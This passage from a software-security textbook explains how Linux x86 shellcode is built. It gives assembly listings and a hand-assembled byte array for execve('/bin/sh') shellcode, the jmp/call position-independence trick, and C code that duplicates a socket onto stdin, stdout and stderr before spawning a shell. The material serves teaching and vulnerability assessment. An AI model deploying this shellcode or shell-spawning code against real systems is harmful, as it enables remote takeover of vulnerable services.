The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities

Buffer overflows are usually exploited by directing execution to a known location in memory where attacker-controlled data is stored. For an exploit to be successful, this location must contain executable machine code that allows attackers to perform malicious activities. This is achieved by constructing small snippets of machine code designed to launch a shell, connect back to the originating user, or do whatever the attacker chooses. At the time of this writing, the most common trend in shellcode construction uses stubs capable of loading additional components on demand over a connected socket, as needed by an attacker on the other end.

Writing the Code

At the most basic level, shellcode is a small chunk of position-independent code that uses system APIs to achieve your objectives. To see how this is done, consider the simple case of spawning a shell in UNIX. In this case, the code you want to run is roughly the following:

char *args[] = { "/bin/sh", NULL };
execve("/bin/sh", args, NULL);

This simple code spawns a command shell when it runs. If this code were run in a network service, the socket descriptor the user is connected with would need to be duplicated over stdin, stdout, and optionally stderr as well.
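The descriptor duplication described above can be sketched in C as follows. This is a minimal illustration rather than a definitive implementation: the helper names redirect_stdio() and spawn_shell_on() are hypothetical, and the sketch assumes a POSIX system where fd is an already connected socket.

```c
#include <unistd.h>

/* Hypothetical helper: point stdin, stdout, and stderr at `fd`.
 * Returns 0 on success, -1 if any dup2() call fails. */
int redirect_stdio(int fd)
{
    for (int target = STDIN_FILENO; target <= STDERR_FILENO; target++) {
        if (dup2(fd, target) == -1)
            return -1;
    }
    return 0;
}

/* Hypothetical helper: hand the connection on `fd` to a shell.
 * Returns -1 only if redirection or execve() fails; on success
 * the process image is replaced and this function never returns. */
int spawn_shell_on(int fd)
{
    char *args[] = { "/bin/sh", NULL };

    if (redirect_stdio(fd) == -1)
        return -1;
    execve("/bin/sh", args, NULL);
    return -1;
}
```

Shellcode performs the same sequence with raw system calls: three dup2() calls followed by execve().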

To construct the machine code required to spawn the shell, you need to understand how this code works at a lower level. The execve() function is exported by the standard C library, so a normal program would first locate the libc execve() implementation with a little help from the loader, and then call it. Because this functionality could be difficult to duplicate in reasonably sized shellcode, generally you want to look for a simpler solution. As it turns out, execve() is also a system call on UNIX systems, and all the libc function does is perform the system call.
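To see that the libc function is only a thin layer over the kernel interface, you can issue the system call yourself through the generic syscall() wrapper. The sketch below assumes Linux with glibc; raw_execve() is a hypothetical name chosen for illustration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* expose syscall() in <unistd.h> on glibc */
#endif
#include <sys/syscall.h>     /* SYS_execve */
#include <unistd.h>          /* syscall() */

/* Hypothetical wrapper: request execve from the kernel directly,
 * bypassing the libc execve() function. Returns -1 on failure;
 * on success it does not return. */
long raw_execve(const char *path, char *const argv[], char *const envp[])
{
    return syscall(SYS_execve, path, argv, envp);
}
```

Shellcode goes one step further and drops syscall() as well, loading the registers and trapping into the kernel itself.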

Invoking system calls on an Intel-based OS usually involves building an argument list (in registers or on the stack, depending on the OS), and then asking the kernel to perform a system call on behalf of the process. This can be done with a variety of methods. For Intel systems, the system call functionality can rely on a software interrupt, initiated by the int instruction; a call gate, invoked with an lcall; or special-purpose machine support, such as sysenter. For Linux and many BSD variants, the int 128 interrupt is reserved for system calls. When this interrupt is generated, the kernel handles it, determines that the process needs some system function performed, and carries out the requested task. The procedure for Linux systems is as follows:

1. Put the system call parameters in general-purpose registers starting at EBX. If a system call requires more than five parameters, additional parameters are placed on the stack.

2. Put the system call number of the desired system call in EAX.

3. Use the int 128 instruction to perform the system call.
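The register assignment in these steps can be modeled in plain C. The sketch below does not execute a system call; it only records which value would land in which register. The struct i386_regs type and the load_syscall() function are hypothetical names, and the order after EBX (ECX, EDX, ESI, EDI) is the Linux i386 convention.

```c
#include <stddef.h>
#include <stdint.h>

#define I386_NR_EXECVE 11u   /* 0x0b, the execve() number used in this section */

/* Model of the registers that carry a Linux i386 system call. */
struct i386_regs {
    uint32_t eax;                      /* system call number */
    uint32_t ebx, ecx, edx, esi, edi;  /* parameters 1 through 5 */
};

/* Hypothetical helper: fill `regs` for system call `number`.
 * Unused parameter registers are zeroed. Returns -1 if more than
 * five parameters are supplied, because this model covers only
 * the register-passed case. */
int load_syscall(struct i386_regs *regs, uint32_t number,
                 const uint32_t *params, size_t count)
{
    uint32_t *slots[] = { &regs->ebx, &regs->ecx, &regs->edx,
                          &regs->esi, &regs->edi };
    size_t nslots = sizeof slots / sizeof slots[0];

    if (count > nslots)
        return -1;
    for (size_t i = 0; i < nslots; i++)
        *slots[i] = (i < count) ? params[i] : 0;
    regs->eax = number;
    return 0;
}
```

For execve(), the three parameters are the pathname address, the argv address, and the envp address, so only EBX, ECX, and EDX carry meaningful values.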

So the assembly code would look something like this initially:

xorl %eax, %eax                      # zero out EAX
movl %eax, %edx                      # EDX = envp = NULL
movl $address_of_shell_string, %ebx  # EBX = path parameter
movl $address_of_argv, %ecx          # ECX = argv
movb $0x0b, %al                      # AL = syscall number for execve()
int $0x80                            # invoke the system call

Nearly all functionality you need when you create shellcode consists of a series of system calls and follows the same basic principles presented here. In Windows, the system call numbers aren't consistent across OS versions, so most Windows shellcode loads system libraries and calls functions in those libraries. A hacker group known as Last Stage of Delirium (LSD) documented the basis for what's used to write most modern Windows shellcode at www.lsd-pl.net/projects/winasm.zip.

Finding Your Code in Memory

The constructed machine code snippets must be position independent; that is, they must be able to run successfully regardless of their location in memory. To understand why this is important, consider the example in the previous section; you need to provide the address of the argument vector and the address of the string "/bin/sh" for the pathname parameter. By using absolute addresses, you limit your shellcode's reliability to a large degree and would need to modify it for every exploit you write. Therefore, you should have a method of determining these addresses dynamically, regardless of the process environment in which the code is running.
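The difference between an absolute address and one computed at runtime can be illustrated with a small C model. In this sketch the payload layout, the PATH_OFFSET constant, and both function names are hypothetical; the four leading bytes are NOP placeholders standing in for real code.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical layout: placeholder code bytes, then the string. */
#define PATH_OFFSET 4
static const unsigned char payload[] = {
    0x90, 0x90, 0x90, 0x90,                  /* stand-in for code (NOPs) */
    '/', 'b', 'i', 'n', '/', 's', 'h', '\0'  /* data carried with the code */
};

/* Resolve the string relative to wherever the payload currently lives. */
const char *path_in(const unsigned char *base)
{
    return (const char *)(base + PATH_OFFSET);
}

/* Copy the payload to `dst` (which must hold at least sizeof payload
 * bytes) and resolve the string at the new location. */
const char *relocate_and_resolve(unsigned char *dst)
{
    memcpy(dst, payload, sizeof payload);
    return path_in(dst);
}
```

Because the string is found as an offset from the payload's own base, the lookup succeeds wherever the bytes are copied. A hard-coded absolute pointer would be valid for only one of those locations.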

Usually, on Intel x86 CPUs, the strings or data required by shellcode are supplied alongside the code, and their addresses are calculated at runtime. To understand how this works, consider the semantics of the call instruction. This instruction implicitly saves a return address on the stack, which is the address of the first byte after the call instruction. Therefore, shellcode is often constructed with the following format:

    jmp end
code:
    ... shellcode ...
end:
    call code
    .string "/bin/sh"

This example jumps to the end of the code and then uses call to run code located directly after the jmp instruction. What is the point of this indirection? Basically, you have the address of the string "/bin/sh" located on the stack because the call instruction implicitly pushes a return address, and the string is the first thing after the call. Hence, the address of "/bin/sh" can be calculated automatically, regardless of where the shellcode is located in the target application. Combining this with the information in the previous section, execve() shellcode would look something like this:

    jmp end
code:
    popl %ebx           # EBX = pathname argument
    xorl %eax, %eax     # zero out EAX
    movl %eax, %edx     # EDX = envp
    pushl %eax          # put NULL in argv array
    pushl %ebx          # put "/bin/sh" in argv array
    movl %esp, %ecx     # ECX = argv
    movb $0x0b, %al     # 0x0b = execve() system call
    int $0x80           # system call
end:
    call code
    .string "/bin/sh"

As you can see, the code to start a shell is fairly straightforward; you simply need to fill EBX, ECX, and EDX with pathname, argv, and envp respectively, and then invoke a system call. This example is a simple shellcode snippet, but more complex shellcode is based on the same principles.
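To check the jmp/call arithmetic, the listing can be written out as bytes and the branch targets decoded in C. The byte values below were assembled by hand for this sketch and should be treated as an assumption, not as output from the original text; the function names are hypothetical. Nothing is executed; the code only computes offsets within the array.

```c
#include <stddef.h>
#include <stdint.h>

/* Hand-assembled i386 encoding of the execve() shellcode (assumption). */
static const unsigned char shellcode[] = {
    0xeb, 0x0d,                           /*  0: jmp   end             */
    0x5b,                                 /*  2: code: popl %ebx       */
    0x31, 0xc0,                           /*  3: xorl  %eax, %eax      */
    0x89, 0xc2,                           /*  5: movl  %eax, %edx      */
    0x50,                                 /*  7: pushl %eax            */
    0x53,                                 /*  8: pushl %ebx            */
    0x89, 0xe1,                           /*  9: movl  %esp, %ecx      */
    0xb0, 0x0b,                           /* 11: movb  $0x0b, %al      */
    0xcd, 0x80,                           /* 13: int   $0x80           */
    0xe8, 0xee, 0xff, 0xff, 0xff,         /* 15: end: call code        */
    '/', 'b', 'i', 'n', '/', 's', 'h', 0  /* 20: .string "/bin/sh"     */
};

/* Offset reached by the short jmp (EB rel8) located at `at`. */
size_t jmp_rel8_target(const unsigned char *code, size_t at)
{
    return (size_t)((long)at + 2 + (int8_t)code[at + 1]);
}

/* Offset of the byte after a near call (E8 rel32) located at `at`.
 * This is the return address the CPU pushes, relative to the base. */
size_t call_return_offset(size_t at)
{
    return at + 5;
}

/* Offset reached by the near call (E8 rel32) located at `at`.
 * Assumes two's-complement conversion, as on GCC and Clang. */
size_t call_rel32_target(const unsigned char *code, size_t at)
{
    uint32_t raw = (uint32_t)code[at + 1]
                 | ((uint32_t)code[at + 2] << 8)
                 | ((uint32_t)code[at + 3] << 16)
                 | ((uint32_t)code[at + 4] << 24);
    return (size_t)((long)call_return_offset(at) + (int32_t)raw);
}
```

The jmp at offset 0 lands on the call at offset 15, the call transfers control back to the popl at offset 2, and the pushed return address corresponds to offset 20, where "/bin/sh" begins. Both displacements are relative, so the bytes work unchanged at any load address.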
